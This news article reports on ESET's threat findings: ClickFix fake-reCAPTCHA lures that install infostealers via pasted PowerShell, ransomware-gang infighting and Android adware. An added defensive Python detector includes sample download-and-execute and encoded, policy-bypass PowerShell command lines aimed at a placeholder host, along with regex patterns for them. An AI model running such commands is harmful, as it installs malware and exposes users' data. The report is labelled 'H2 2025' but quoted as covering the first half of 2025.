- ClickFix is increasingly used to install infostealers
- The attack vector has seen a 500% increase in the last 6 months
- Users are told to run commands in PowerShell to correct an error
The use of the ClickFix attack vector has increased by 517% since the second half of 2024, making it the second most abused attack vector behind phishing.
The attack uses a fake reCAPTCHA to encourage users to execute code in a PowerShell terminal as a “fix” for a fake error.
This causes malware and infostealers to be downloaded and executed on the target device, which then harvest sensitive data and exfiltrate it to the attackers.
Infostealers increasing
ESET’s H2 2025 threat report explains how ClickFix is abused by attackers to distribute some of the most popular infostealer malware, including Lumma Stealer, Vidar Stealer, StealC and DanaBot.
The attack vector is so effective because it relies on very simple instructions to get users to execute complex commands in the PowerShell terminal. Many users will simply ignore or not understand the commands they are running, focusing instead on trying to fix the error.
ClickFix is generally distributed via phishing emails that direct the user to a fake website, which then demands reCAPTCHA verification for access. PowerShell commands often bypass antivirus software, making this a particularly effective way to compromise devices, especially if the attacker can get the user to run them.
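The pattern described above (a user pastes a "fix" command into the Run dialog or terminal, and the resulting PowerShell process downloads and runs a payload) leaves a recognisable trace in process-creation telemetry. The following detector is an added example, not code from ESET's report or from this article; it runs over constructed process-creation records in an assumed tab-separated Key=Value shape (field names modelled on Sysmon Event ID 1, but the format and all sample values, including the example.invalid URL, are invented for illustration) and flags PowerShell launched from the Windows shell together with download-and-execute, hidden-window, policy-bypass or encoded-command indicators.

```python
"""Heuristic detector for ClickFix-style PowerShell launches.

Added example (not from the ESET report or the article). Records are
constructed, tab-separated Key=Value lines with Sysmon-like field names
(User, Image, ParentImage, CommandLine); the format is an assumption.
"""
import re
from dataclasses import dataclass, field

# The Win+R Run dialog and the File Explorer address bar both spawn their
# children from explorer.exe, so that parent marks an interactive launch.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Script hosts a pasted "fix" command typically invokes.
HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe"}

# Command-line indicators: hidden window, execution-policy bypass,
# a web download piped into an invocation, or a long encoded command.
PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "exec_bypass": re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I),
    "download_exec": re.compile(
        r"(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring)\b"
        r".*\|\s*(?:iex|invoke-expression)", re.I),
    "encoded_cmd": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}


@dataclass
class Finding:
    line_no: int
    user: str
    image: str
    parent: str
    indicators: list = field(default_factory=list)


def parse_record(line: str) -> dict:
    """Split one constructed record into a field dict (tab-separated Key=Value)."""
    fields = {}
    for part in line.split("\t"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def analyse(records):
    """Return a Finding for each record that looks like a pasted ClickFix command."""
    findings = []
    for n, line in enumerate(records, 1):
        r = parse_record(line)
        image = r.get("Image", "").rsplit("\\", 1)[-1].lower()
        parent = r.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        cmd = r.get("CommandLine", "")
        if image not in HOSTS:
            continue
        indicators = [name for name, rx in PATTERNS.items() if rx.search(cmd)]
        if parent in INTERACTIVE_PARENTS:
            indicators.append("interactive_parent")
        # Require the interactive parent plus at least one command-line
        # indicator, so scheduled scripts and plain shell windows are not flagged.
        if "interactive_parent" in indicators and len(indicators) >= 2:
            findings.append(Finding(n, r.get("User", "?"), image, parent, indicators))
    return findings


# Constructed sample telemetry (not real logs). The suspicious lines use a
# reserved .invalid domain and an arbitrary base64 string as placeholders.
SAMPLE_LOG = [
    # Benign: scheduled maintenance script launched by a service host.
    "User=CORP\\svc_backup\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tParentImage=C:\\Windows\\System32\\svchost.exe\tCommandLine=powershell.exe -File C:\\Scripts\\backup.ps1",
    # Benign: user opens an interactive PowerShell window from the shell.
    "User=CORP\\jdoe\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tParentImage=C:\\Windows\\explorer.exe\tCommandLine=powershell.exe",
    # Suspicious: hidden window, remote script piped into iex, launched from explorer.exe.
    "User=CORP\\jdoe\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tParentImage=C:\\Windows\\explorer.exe"
    "\tCommandLine=powershell -w hidden -c \"iwr https://captcha.example.invalid/v.txt | iex\"",
    # Suspicious: policy bypass plus encoded command, launched from explorer.exe.
    "User=CORP\\asmith\tImage=C:\\Program Files\\PowerShell\\7\\pwsh.exe"
    "\tParentImage=C:\\Windows\\explorer.exe"
    "\tCommandLine=pwsh -nop -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.user} ran {f.image} from {f.parent}: {', '.join(f.indicators)}")
```

Running the block flags only the two pasted-command records; the scheduled script (non-interactive parent) and the plain interactive PowerShell window (no command-line indicator) pass. In production the same logic would consume Sysmon or Security 4688 events, and the parent-process condition is what separates this behaviour from ordinary administrative PowerShell use.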
In other infostealer news, ESET’s threat report shows that SnakeStealer has overtaken Agent Tesla as the most detected infostealer. SnakeStealer was spotted being used in a massive campaign targeting hundreds of EU companies to steal credentials.
Ransomware gangs experienced an unexpectedly tumultuous period thanks to infighting and rivalries between different ransomware outfits. The DragonForce group launched a series of hostile campaigns against some of the most infamous ransomware groups, including BlackLock, Mamona and the ransomware-as-a-service giant RansomHub.
Although there have been major law enforcement actions against ransomware groups in recent months, including the takedown of 8Base, it seems that these rivalries have caused the most damage to the ransomware ecosystem.
On the mobile front, the recent wave of Kaleidoscope infections drove a 160% increase in Android adware detections. Malware distributed through official app stores is nothing new, with recent malware distributions on both the Apple App Store and Google Play Store.
However, Kaleidoscope used a two-stage attack method: serving intrusive advertisements on the target device to generate advertising revenue, while infecting target devices with a malicious twin application downloaded via a third-party app store.
“With new social engineering techniques, sophisticated mobile threats and the disruption of major infostealers, the threat landscape in the first half of 2025 was anything but boring,” said Jiří Kropáč, director of ESET’s threat prevention labs.